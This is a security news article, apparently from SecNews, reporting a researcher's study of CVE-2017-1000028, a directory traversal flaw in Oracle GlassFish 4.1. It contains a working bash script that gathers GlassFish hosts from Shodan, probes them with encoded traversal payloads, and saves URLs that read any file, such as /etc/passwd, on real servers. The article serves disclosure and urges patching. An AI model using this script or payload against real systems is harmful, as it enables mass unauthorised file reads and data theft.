GlassFish Oracle Vulnerability: Security researcher Dimitris Roussis analyzes how a vulnerability in Oracle 's well-known GlassFish Application Server , identified as CVE -2017-1000028 ( https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-1000028 ), currently exposes data on thousands of servers worldwide.

Exploiting the security gap allows reading, through a Directory Traversal Attack, of all files on the server where the Application Server is installed.
In the analysis carried out by the researcher, 300 servers are initially used as a sample through the shodan search engine that have GlashFish version 4.1 installed.
![]()
Then, through an automated script created by the researcher, it is checked which of the servers actually have the vulnerability.
#!/bin/bash # Get 300 Results From Shodan search engine shodan search --limit 300 --fields ip_str GlassFish 4.1 port:4848 > servers_ip.txt # Sort IP cat servers_ip.txt | sort -n -t . -k 1,1 -k 2,2 -k 3,3 -k 4,4 > servers_sort.txt # Remove All Whitespace sed -r 's/\s+//g' servers_sort.txt > servers.txt # Delete Temporary Files rm servers_ip.txt rm servers_sort.txt # Server List input="servers.txt" # check Server for the vulnerability while IFS= read -r line do ip=$line # https://server_ip/theme/META-INF/../../../../../../../../../../ url="https://$line:4848/theme/META-INF/%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%a f%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af" echo -n "ip: $line" fetch=`curl -s -o /dev/null --max-time 5 -w "%{http_code}" $url`; if [ $fetch = 200 ] then echo " - Connection Successful! Server is vulnerable" #Save result in vulnerable_servers.txt echo "$url" >> vulnerable_servers.txt else echo " - Connection Failed! Server is Not vulnerable" fi done < "$input"
The final result of the script is the creation of a file that includes links (urls) to directly exploit the vulnerability.
By looking at the links included in the browser we can see all the files in the /root of the Server.
Indicatively:
Windows Server

Linux Server

We can now access any file we want on the Server by adding the file path to the end of the url.
B.C.
/etc/passwd
/root
The above study demonstrates, on the one hand, that a vulnerability can lead to the disclosure of data on a large scale worldwide and, on the other hand, the necessity of immediate implementation of software updates by system administrators.
The editorial team of SecNews warmly thanks researcher Dimitrios Roussis for the authoritative and timely information.
* Dimitris Roussis is a member of the Information Systems Security Laboratory of the University of the Aegean.
https://www.icsd.aegean.gr/group/members-data.php?group=L1&member=1652
